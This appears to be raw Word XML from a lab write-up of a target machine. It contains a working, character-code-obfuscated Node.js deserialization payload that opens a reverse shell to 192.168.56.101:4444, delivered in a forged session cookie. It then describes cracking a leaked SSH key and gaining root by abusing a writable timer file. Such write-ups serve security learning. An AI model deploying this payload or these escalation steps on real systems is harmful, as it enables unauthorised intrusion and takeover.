      </w:r>
      <w:r w:rsidRPr="00D15B6A">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>"rce"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15B6A">
        <w:rPr>
          <w:rStyle w:val="ou"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15B6A">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,53,54,46,49,48,49,34,59,10,80,79,82,84,61,34,52,52,52,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15B6A">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D15B6A">
        <w:rPr>
          <w:rStyle w:val="ou"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210BF22" w14:textId="77777777" w:rsidR="006A7FFB" w:rsidRDefault="006A7FFB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18226B9A" w14:textId="60B30E2D" w:rsidR="00D15B6A" w:rsidRDefault="00D15B6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Then I encoded it</w:t>
      </w:r>
      <w:r w:rsidR="005A3301">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, in base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442201B0" w14:textId="1AD47CEE" w:rsidR="00B506C0" w:rsidRPr="00D15B6A" w:rsidRDefault="007C46B9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2697F7" wp14:editId="526A1568">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>462583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2872740" cy="1711325"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21400"/>
                <wp:lineTo x="21485" y="21400"/>
                <wp:lineTo x="21485" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13657392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39267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6C0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Using the same webpage I replaced the admin session cookie I made and used the payload above (in base64).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20784CD7" w14:textId="4FF835A2" w:rsidR="00D3074C" w:rsidRDefault="007C46B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I did have nc listening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149AFE94" w14:textId="61750723" w:rsidR="008A1366" w:rsidRDefault="008A1366">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F959AFB" w14:textId="77777777" w:rsidR="007C46B9" w:rsidRDefault="007C46B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2516F73C" w14:textId="77777777" w:rsidR="007C46B9" w:rsidRDefault="007C46B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349A310B" w14:textId="77777777" w:rsidR="007C46B9" w:rsidRDefault="007C46B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7110C817" w14:textId="77777777" w:rsidR="007C46B9" w:rsidRPr="00D15B6A" w:rsidRDefault="007C46B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7105C072" w14:textId="666AEDD2" w:rsidR="00C1059E" w:rsidRDefault="00C1059E" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc147658976"/>
      <w:r>
        <w:t>Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="54B1E40A" w14:textId="57FFB8C6" w:rsidR="00D21621" w:rsidRDefault="000D028A" w:rsidP="0091352F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc147658977"/>
      <w:r>
        <w:t>Upgrade Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2C3E8DCF" w14:textId="08605AA0" w:rsidR="000D028A" w:rsidRDefault="0091352F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="284340E2" wp14:editId="3C1EB110">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>39702</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2807335" cy="470535"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20988"/>
                <wp:lineTo x="21400" y="20988"/>
                <wp:lineTo x="21400" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="11159245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2451" name="Picture 1" descr="A close up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954" cy="47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EFE3D" w14:textId="42F941F5" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="7A4AE600" w14:textId="2C24EAF5" w:rsidR="007307F9" w:rsidRDefault="00A81CC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D5B9974" wp14:editId="72717BB7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5090</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2407920" cy="920750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21004"/>
                <wp:lineTo x="21361" y="21004"/>
                <wp:lineTo x="21361" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="123824984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49846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44886" w14:textId="707DFB77" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="16EBAF73" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="798148D2" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="24E631C4" w14:textId="48DAC99B" w:rsidR="007307F9" w:rsidRDefault="00FE21B4" w:rsidP="00FE21B4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc147658978"/>
      <w:r>
        <w:t>Misconfig Script (mine)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="356EC092" w14:textId="6AC1BD5D" w:rsidR="007307F9" w:rsidRDefault="000772DE">
      <w:r>
        <w:t>I couldn’t try and recommended exploits because C compiler wasn’t there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40124B3E" w14:textId="00BB12A4" w:rsidR="00991954" w:rsidRDefault="00991954" w:rsidP="00503705">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc147658979"/>
      <w:r>
        <w:t>Directory traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1E31ED8B" w14:textId="7620CE57" w:rsidR="00991954" w:rsidRDefault="007E5021">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E077D37" wp14:editId="6398D9F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264426</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21257"/>
                <wp:lineTo x="21538" y="21257"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="62848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87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54A">
        <w:t>I found /var/backups and noticed some passwords</w:t>
      </w:r>
      <w:r w:rsidR="00F978AA">
        <w:t xml:space="preserve"> bak files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D0D489" w14:textId="5FE38114" w:rsidR="000070CB" w:rsidRDefault="007E5021">
      <w:r>
        <w:t>The last one is readable to me, so I will copy it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1245C7A5" w14:textId="4F4D4D0A" w:rsidR="007307F9" w:rsidRDefault="007B5765">
      <w:r>
        <w:t>I then moved it to the temp directory and unzipped it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0544A6" w14:textId="32710E1B" w:rsidR="007307F9" w:rsidRDefault="00FF70D4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3636FF05" wp14:editId="78054EFE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5971</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5190476" cy="809524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20854"/>
                <wp:lineTo x="21486" y="20854"/>
                <wp:lineTo x="21486" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13760445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458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1914D" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="4AAAAD29" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="797DC1F2" w14:textId="287B1369" w:rsidR="007307F9" w:rsidRDefault="00FF70D4">
      <w:r>
        <w:t>I copied to output to my kali machine to use for ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05851671" w14:textId="2A640343" w:rsidR="007307F9" w:rsidRDefault="00AB4781" w:rsidP="00B46BB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc147658980"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cracking Password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="3AABEAB0" w14:textId="1AFA9171" w:rsidR="001E6D67" w:rsidRPr="001E6D67" w:rsidRDefault="001E6D67" w:rsidP="00200DEB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc147658981"/>
      <w:r>
        <w:t>SSH2John</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="31BAFF40" w14:textId="39A7C3E0" w:rsidR="00AB4781" w:rsidRDefault="008D3946">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74122896" wp14:editId="17BAF35D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5971</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2904762" cy="219048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18837"/>
                <wp:lineTo x="21392" y="18837"/>
                <wp:lineTo x="21392" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="55223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38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7AD49" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="5C911F2D" w14:textId="1C1D1915" w:rsidR="00484A98" w:rsidRDefault="003F5868" w:rsidP="002376F7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc147658982"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06B851F7" wp14:editId="23580A94">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>251071</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5638095" cy="285714"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20205"/>
                <wp:lineTo x="21459" y="20205"/>
                <wp:lineTo x="21459" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="48947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2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A98">
        <w:t>John</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="54B1CC81" w14:textId="3638B9AC" w:rsidR="007208B0" w:rsidRDefault="008A51C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3937CBE2" wp14:editId="485C1AFA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>361249</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2600000" cy="276190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19410"/>
                <wp:lineTo x="21368" y="19410"/>
                <wp:lineTo x="21368" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="131675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539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0F782" w14:textId="316DE34B" w:rsidR="007307F9" w:rsidRDefault="00103C9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251706368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FB58FCF" wp14:editId="60992B31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>190851</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3923809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394" y="19990"/>
                <wp:lineTo x="21394" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="55158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834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93840" w14:textId="677B98A7" w:rsidR="007307F9" w:rsidRDefault="006F1D51">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="489D8CFF" wp14:editId="0B9C2207">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264426</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="374650"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20868"/>
                <wp:lineTo x="21538" y="20868"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="209551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157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A3CCC" w14:textId="5030495F" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="63AFF28D" w14:textId="5FCC7BBD" w:rsidR="007307F9" w:rsidRDefault="00AB53F4" w:rsidP="00F36629">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc147658983"/>
      <w:r>
        <w:t>Flag 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="0E0EB497" w14:textId="0C96FA98" w:rsidR="00AB53F4" w:rsidRDefault="00F36629">
      <w:r>
        <w:t>Located in serv-adm home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C40BB" w14:textId="501C9A27" w:rsidR="00F36629" w:rsidRDefault="00F36629">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251710464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7452BB4F" wp14:editId="2A53D52A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3742857" cy="371429"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19973"/>
                <wp:lineTo x="21439" y="19973"/>
                <wp:lineTo x="21439" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="19493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79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6D23E" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="591EC413" w14:textId="6D3878E0" w:rsidR="007307F9" w:rsidRDefault="005A61BE" w:rsidP="005A61BE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc147658984"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251712512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E961014" wp14:editId="3FFA0B51">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-13648</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>367637</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5428571" cy="628571"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20967"/>
                <wp:lineTo x="21529" y="20967"/>
                <wp:lineTo x="21529" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="73845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536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do -l</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3107EE7B" w14:textId="404C56F3" w:rsidR="007307F9" w:rsidRDefault="005F494E">
      <w:r>
        <w:t>I will try and list the timers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340ED55" w14:textId="45E6DC76" w:rsidR="007307F9" w:rsidRDefault="001573E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="44A47BE6" wp14:editId="2BFA5D5E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5371429" cy="180952"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18254"/>
                <wp:lineTo x="21452" y="18254"/>
                <wp:lineTo x="21452" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="134961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71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BC085" w14:textId="67CB23C5" w:rsidR="007307F9" w:rsidRDefault="008445D1">
      <w:r>
        <w:t>Since I have permission to modify this file  I can modify it have this.</w:t>
      </w:r>
      <w:r w:rsidR="00EC079F">
        <w:t xml:space="preserve"> It will get my ssh key and make it the authorised one in the root file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF8863" w14:textId="4E769CD8" w:rsidR="00746E8D" w:rsidRDefault="00746E8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D59155F" wp14:editId="2225490A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>13648</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>612244</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="138430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="17835"/>
                <wp:lineTo x="21538" y="17835"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="190118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875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19F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22C71ED0" wp14:editId="7D431683">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>331811</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="163830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20093"/>
                <wp:lineTo x="21538" y="20093"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
